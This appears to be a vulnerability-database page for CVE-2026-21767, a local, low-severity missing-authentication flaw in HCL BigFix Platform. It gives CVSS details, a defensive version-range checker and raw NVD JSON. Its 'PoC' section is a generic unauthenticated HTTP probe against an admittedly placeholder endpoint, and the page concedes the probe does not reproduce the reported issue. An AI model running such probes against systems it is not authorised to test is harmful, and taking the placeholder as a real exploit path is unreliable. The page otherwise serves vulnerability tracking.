Security Vulnerability Report
CVE-2026-21767 CVSS 4.0 MEDIUM

CVE-2026-21767

Published: 2026-04-02 00:16:24
Last Modified: 2026-04-16 16:05:39

Description

HCL BigFix Platform is affected by insufficient authentication (CWE-306, Missing Authentication for Critical Function, per the weakness entry in the NVD record below). The application might allow users to access sensitive areas of the application without proper authentication.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The score shown above is the Secondary metric in the NVD record. NIST's Primary analysis uses CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, which scores 3.3 (LOW): the only difference is Privileges Required (Low instead of None), which lowers the exploitability sub-score from 2.5 to 1.8 while the impact sub-score stays at 1.4. Both vectors rate the attack vector as Local, scope unchanged, and the impact as Low confidentiality only, so neither characterises this as a remotely reachable authentication bypass.

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_platform:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Platform, versions 11.0.0 through 11.0.5 inclusive per the NVD configuration node (versionStartIncluding 11.0.0, versionEndIncluding 11.0.5). For the exact affected and fixed builds, refer to the official vendor advisory KB0129906.
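Deciding whether a deployed BigFix Platform build sits inside that range is a version comparison, and doing it with a string comparison gets 11.0.10 wrong (it sorts before 11.0.5 lexically). The checker below is an added example, not code from the report or from HCL: it evaluates the cpeMatch bounds from the raw JSON on this page (copied here as a constructed excerpt) against an observed version string, comparing components numerically and honouring all four NVD bound keys. It only evaluates OR nodes, which is all this record contains; AND nodes (running-on/with configurations) are not handled.

```python
"""Affected-version check for CVE-2026-21767 (added example, not from the page).

Evaluates NVD cpeMatch version bounds against an observed product version.
Components are compared as integers so 11.0.10 > 11.0.5, and shorter versions
are zero-padded so 11.0 == 11.0.0.
"""

# Constructed excerpt of the configurations node from the raw NVD JSON below.
CPE_MATCH = {
    "vulnerable": True,
    "criteria": "cpe:2.3:a:hcltech:bigfix_platform:*:*:*:*:*:*:*:*",
    "versionStartIncluding": "11.0.0",
    "versionEndIncluding": "11.0.5",
}
RECORD = {
    "cve": {
        "id": "CVE-2026-21767",
        "configurations": [
            {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [CPE_MATCH]}]}
        ],
    }
}


def parse_version(version: str) -> tuple:
    """'11.0.5' -> (11, 0, 5). Non-numeric components fail loudly rather than
    silently comparing as strings."""
    try:
        return tuple(int(p) for p in version.strip().split("."))
    except ValueError as exc:
        raise ValueError(f"non-numeric version component in {version!r}") from exc


def compare(a: tuple, b: tuple) -> int:
    """-1, 0 or 1 after zero-padding both tuples to the same length."""
    n = max(len(a), len(b))
    a = a + (0,) * (n - len(a))
    b = b + (0,) * (n - len(b))
    return (a > b) - (a < b)


# NVD bound key -> predicate on compare(observed, bound) that must hold.
BOUND_CHECKS = (
    ("versionStartIncluding", lambda c: c >= 0),
    ("versionStartExcluding", lambda c: c > 0),
    ("versionEndIncluding", lambda c: c <= 0),
    ("versionEndExcluding", lambda c: c < 0),
)


def is_affected(version: str, match: dict = CPE_MATCH) -> bool:
    """True if the cpeMatch is marked vulnerable and version satisfies every
    bound it carries. Absent bounds are unbounded, as in NVD semantics."""
    if not match.get("vulnerable", False):
        return False
    observed = parse_version(version)
    for key, ok in BOUND_CHECKS:
        bound = match.get(key)
        if bound is not None and not ok(compare(observed, parse_version(bound))):
            return False
    return True


def iter_cpe_matches(record: dict):
    """Yield every cpeMatch entry from an NVD record's OR nodes."""
    for config in record["cve"].get("configurations", []):
        for node in config.get("nodes", []):
            if node.get("operator") != "OR" or node.get("negate"):
                continue  # AND / negated nodes are out of scope for this example
            yield from node.get("cpeMatch", [])


def affected_by_record(version: str, record: dict = RECORD) -> bool:
    """True if any cpeMatch in the record covers the observed version."""
    return any(is_affected(version, m) for m in iter_cpe_matches(record))


if __name__ == "__main__":
    for v in ("10.0.12", "11.0.0", "11.0.5", "11.0.6", "11.0.10"):
        print(f"{v:>8}: {'affected' if affected_by_record(v) else 'not in range'}")
```

The record's own bounds are the only input; feed the script the version string reported by a BigFix root server and treat a True result as "inside the NVD range", then confirm against KB0129906 before closing or opening a ticket, since the vendor advisory, not the CPE range, is authoritative for fixed builds.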

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21767 PoC concept (HCL BigFix Platform, insufficient authentication)
# Description: sends an unauthenticated request to an endpoint that should
# require authentication and reports whether the server serves it anyway.
# Caveats: the endpoint below is a placeholder, not a path from the vendor
# advisory, and the record's CVSS vector is AV:L (Local), so a remote
# unauthenticated HTTP probe does not by itself reproduce the reported issue.
import sys

import requests


def check_vulnerability(target_url):
    # Example sensitive endpoint that should require authentication.
    # Replace with the actual vulnerable endpoint path based on the vendor advisory.
    sensitive_path = "/api/sensitive/configuration"
    full_url = f"{target_url.rstrip('/')}{sensitive_path}"
    print(f"[*] Attempting to access: {full_url}")
    try:
        # Send the request without any authentication headers or cookies.
        response = requests.get(full_url, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

    if response.status_code == 200:
        print("[+] Potential vulnerability detected!")
        print("[+] Server responded with 200 OK without authentication.")
        print(f"[+] Response snippet: {response.text[:200]}")
    elif response.status_code in (401, 403):
        print("[-] Access denied. Authentication is working properly.")
    else:
        print(f"[?] Unexpected status code: {response.status_code}")
    return response.status_code


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <http://target_ip:port>")
        sys.exit(1)
    check_vulnerability(sys.argv[1])

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129906 (Vendor Advisory, KB0129906)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-21767",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-02T00:16:24.147",
    "lastModified": "2026-04-16T16:05:38.500",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL BigFix Platform is affected by insufficient authentication.  The application might allow users to access sensitive areas of the application without proper authentication."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:bigfix_platform:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.0.0",
                "versionEndIncluding": "11.0.5",
                "matchCriteriaId": "655B6D28-5486-4ACF-B28F-7346BFB377D0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129906",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}